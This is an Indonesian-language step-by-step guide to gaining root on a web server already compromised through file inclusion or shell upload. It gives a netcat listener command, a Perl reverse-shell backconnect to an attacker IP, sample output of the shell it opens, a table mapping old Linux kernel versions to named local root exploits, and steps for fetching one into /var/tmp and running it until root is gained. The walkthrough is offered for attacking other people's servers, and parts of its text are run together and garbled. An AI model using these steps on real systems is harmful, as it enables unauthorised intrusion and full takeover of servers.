Langkah untuk ngeroot adalah:
- Sediakan pc / Laptop untuk menjalankan Netcat
- Sediakan target yang sudah kita dapat dari (RFI/SHELLUPLOAD/LFI/DSB) yang safemode (OFF)
- Sedikan juga shell injection tools (Locus7, c99, r57, dsb) yang
didalamnya tersedia fasilitas untuk backconnect / gunakan perl
backconnect tools
- Sediakan Netcat (NC) untuk menerima connection dari backconnect
- Sediakan local root exploit yang sesuai dengan kernel target
Oke, kita mulai beraksi
Asumsikan bahwa:
IPHOSTSERVER TARGET =
203.146.102.39PORT SERVER NETCAT TARGET:
007Langkah pertama cara ngeroot:Pastikan bahwa Netcat sudah terinstall & Anda sudah menjalankan Netcat pada Server Anda.
Commandnya sangat sederhana: netcat -n -l -v -p PORT
Contoh: netcat -n -l -v -p 007
<blockquote>$ nc -n -l -v -p 007
Listening on [any] 007 …
</blockquote>
Langkah kedua cara ngeroot:Pastikan bahwa anda sudah melakukan upload locus7 /c99 / r57 ke server
dimana didalamnya terdapat fasilitas backconnect. Jadi kita tinggal
masukkan IP server kita,
Jika anda menggunakan perl backconnect tools, anda cukup ketikkan perintah: perl backconnectortools.txt IPHOSTSEVERANDA PORT
Contoh:
<blockquote>perl backconnect.txt
203.146.102.39</blockquote>
Langkah ketiga cara ngeroot:Tunggulan sampai ada connection dari server target ke server anda,
biasanya akan muncul pesan bahwa terdapat koneksi ke server anda dari
target.
Contoh:
<blockquote>$ nc -n -l -v -p 007
Listening on [any] 007 …
Connect to [
203.146.102.39] from localhost [127.0.0.1] 007
uid=48(apache) gid=48(apache) groups=48(apache)
: : W4ck1ng-shell (private Build v0.3) Bind shell backdoor ::
</blockquote>
Langkah ke-empat cara ngeroot:Anda sudah terkoneksi ke target, disinilah anda harus pandai-pandai
menggunakan command Unix. Anda bisa belajar lebih dahulu command” Unix
server.
Apabila sudah terkoneksi, maka persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER,
untuk melihat versi kernelnya contoh :
$ uname -a
Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386 GNU/LinuxKarena kernel target adalah
2.6.16, maka kita akan menggunakan
2.6.16 -> raptor, raptor2, h0llyshit, prctl untuk exploitnya.<blockquote>2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.0 -> h00lyshit, wuftpd
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.11 ve 2.6.16 Arasi -> prctl, raptor, raptor2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.17 ve Ustlerinde -> 06 cw7.3 Jessica x x2
2.6.17 – 2.6.24-1 -> jessica_biel_naked_in_my_bed.c
2.6.23 – 2.6.24 -> diane_lane_******_hard.c
</blockquote>
Oke kita lanjut, setelah itu kita wget file
raptor, kita tempatkan di yang permissionnya bisa execute. Kita cari saja yang 777
(misal:
/var/tmp).
Kemudian kita jalankan perintahnya:
./raptorw00t: uid=0(root) gid=0(root) groups=0(root)whoamiuid=0(root) gid=0(root) groups=0(root)Buzz, selamat anda sudah mendapatkan akses
root.